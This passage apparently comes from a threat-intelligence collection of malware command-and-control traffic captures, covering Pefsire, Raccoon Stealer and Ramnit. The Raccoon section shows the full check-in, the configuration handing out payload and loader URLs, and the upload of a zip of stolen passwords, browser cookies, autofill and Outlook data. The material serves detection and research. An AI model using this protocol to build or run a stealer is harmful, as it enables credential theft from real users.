Pefsire\n~~~\n00000000 12 10 00 00 00 00 00 00 00 00 00 00 ........ ....\n 00000000 00 00 00 00 06 .....\n0000000C 00 00 00 00 06 .....\n 00000005 00 00 00 00 06 .....\n00000011 00 00 00 00 06 .....\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/raaloader.png \"RaaLoader\")\n\n#### Raccoon Stealer\n~~~\nPOST /gate/log.php HTTP/1.1\nCache-Control: no-cache\nConnection: Keep-Alive\nPragma: no-cache\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 155\nHost: 35.189.105.242\n\nparams=Ym90X2lkPTkwMDU5QzM3LTEzMjAtNDFBNC1CNThELTJCNzVBOTg1MEQyRl9hZG1pbiZjb25maWdfaWQ9NGVkZTQxZmUwZWE5NjMwMzRhM2Q2NWYwZGQ0NDJkZTQ2NzFjMjE0ZiZkYXRhPW51bGw=HTTP/1.1 200 OK\nServer: nginx/1.14.0 (Ubuntu)\nDate: Mon, 30 Sep 2019 19:36:57 GMT\nContent-Type: application/json\nTransfer-Encoding: chunked\nConnection: keep-alive\nAccess-Control-Allow-Origin: *\n\n{\"url\":\"http://35.189.105.242/file_handler/file.php?hash=559f10a49e5f74c12b67d2b61c0dea701f752e43&js=cbe0dbfb63ca8503c1938fc9cdd5f5f3818d81b9&callback=http://35.189.105.242/gate\",\"attachment_url\":\"http://35.189.105.242/gate/sqlite3.dll\",\"libraries\":\"http://35.189.105.242/gate/libs.zip\",\"ip\":\"89.187.165.57\",\"config\":{\"masks\":null,\"loader_urls\":[\"https://mygift.space/download/beam.exe\"]},\"is_screen_enabled\":0,\"is_history_enabled\":0}HTTP/1.1 200 OK\nServer: nginx/1.14.0 (Ubuntu)\nDate: Mon, 30 Sep 2019 19:36:57 GMT\nContent-Type: application/json\nTransfer-Encoding: chunked\nConnection: keep-alive\nAccess-Control-Allow-Origin: *\n\n{\"url\":\"http://35.189.105.242/file_handler/file.php?hash=559f10a49e5f74c12b67d2b61c0dea701f752e43&js=cbe0dbfb63ca8503c1938fc9cdd5f5f3818d81b9&callback=http://35.189.105.242/gate\",\"attachment_url\":\"http://35.189.105.242/gate/sqlite3.dll\",\"libraries\":\"http://35.189.105.242/gate/libs.zip\",\"ip\":\"89.187.165.57\",\"config\":{\"masks\":null,\"loader_urls\":[\"https://mygift.space/download/beam.exe\"]},\"is_screen_enabled\":0,\"is_history_enabled\":0}POST /file_handler/file.php?hash=559f10a49e5f74c12b67d2b61c0dea701f752e43&js=cbe0dbfb63ca8503c1938fc9cdd5f5f3818d81b9&callback=http://35.189.105.242/gate HTTP/1.1\nCache-Control: no-cache\nConnection: Keep-Alive\nPragma: no-cache\nContent-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu\nContent-Length: 2152\nHost: 35.189.105.242\n\n._=\n--Jfbvjwj3489078yuyetu\ncontent-disposition: form-data; name=\"file\"; filename=\"data.zip\"\nContent-Type: application/octet-stream\n\nPK..........>O..5kf.......\n...passwords.txtUT\n..`Y.]ZY.]ZY.]..w..Rp..O.IUp.(..M......\nf....[.....%&.&..g.%....r........R+.\n.K@..\\....P....bcS3^.^.`..n.E.n..0.I2..PK..........>O\"..:............browsers/firefox_cookie.txtUT\n..`Y.]`Y.]`Y.]..KK.@...S.O.8..+.. .+..kJ6a..!.\tmb...T.qQ......\n.@...:.,m..y....\na...RK.\n.......]w.\\.U.k...L<..........s.m...|..9=.].l..0...7W...zY..mi....e...........di\"..|M.t2...T..E...6.RI...dB.-s..c<.c.......;.r..E....tr.[..\n......g@..X....^.Dl.`W.?.YQ.o...F...$\\..K..v..+...\" 0.|.PK..........>O................browsers/firefox_urls.txtUT\n..`Y.]`Y.]`Y.]..K..0...=\tw....>hI....4..(h.lI[.zz....v7.........s.......}.MS...@kd_.n........Vw.e.\n........H1%.@.8._..A.+\\.U._.O.....,C1..q..tj.......'......`..c_.+.Z.N...(2,....|..\t8.vd.f.p.1.,y..PK..........>O.JJ.:...Z.......browsers/chrome_autofill.txtUT\n..ZY.]ZY.]ZY.]s./.U.K.M.Rp.,*...2y..@.e.9.@a.......^..0D.O\"6.A.)E.... ..PK..........>O..GMN...|.......mails/outlook.txtUT\n..eY.]eY.]eY.]..\n\tP.N-*K-.2.4.34..3.3..\n..0.*.....c....Z.P._.....U.Z.T.M\" ...<.(.\"Y......r..PK..........>O..DH....o.......System Info.txtUT\n..eY.]eY.]eY.]mR]k.0.}^ ..>&.6.l..`0'Y..f.$...(.....d$;k..'ws)ez.:..su?~.D][k.....~A.W.3...F....Qx..d.+-...Vi..bn...?.K....V...;...K ^..x..P.1-....8.G..2...pE..<........Y.........?..\".~.5....c.F|........0..u8;....h..2..\tX....g..a\"..|.>T;.IV$.[.,[...{...c..\n. ...f.e.y...%k.[-.@.U..C7?.yX.a.p..o*.8.6..PI.v..7.......Tm.y..?PK............>O..5kf.......\n.\t....... .......passwords.txtUT...`Y.]PK............>O\"..:..........\t....... .......browsers/firefox_cookie.txtUT...`Y.]PK............>O..............\t....... .......browsers/firefox_urls.txtUT...`Y.]PK............>O.JJ.:...Z.....\t....... .......browsers/chrome_autofill.txtUT...ZY.]PK............>O..GMN...|.....\t....... ...~...mails/outlook.txtUT...eY.]PK............>O..DH....o.....\t....... .......System Info.txtUT...eY.]PK....................\n--Jfbvjwj3489078yuyetu--HTTP/1.1 200 OK\nServer: nginx/1.14.0 (Ubuntu)\nDate: Mon, 30 Sep 2019 19:37:10 GMT\nContent-Type: application/json\nTransfer-Encoding: chunked\nConnection: keep-alive\nAccess-Control-Allow-Origin: *\n\ntrue\"success\"\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/raccoon-1.png \"Predator\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/raccoon-2.png \"Predator\")\n\n#### Ramnit\n~~~\nGET / HTTP/1.1\nHost: www.yx-lj.com\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\nHTTP/1.1 200 OK\nContent-Length: 114482\nContent-Type: text/html\nContent-Location: http://www.yx-lj.com/index.htm\nLast-Modified: Tue, 21 May 2019 01:43:35 GMT\nAccept-Ranges: bytes\nETag: \"47c7bf9a76fd51:ac9\"\nServer: Microsoft-IIS/6.0\nMicrosoftOfficeWebServer: 5.0_Pub\nX-Powered-By: ASP.NET\nDate: Thu, 17 Oct 2019 18:56:31 GMT\n\n\n\n..........\n\n\n\n\n\n\n\n\n\n\n\n..........\n\n \n \n \n
\n \n \n \n \n
\n\n\n\n \n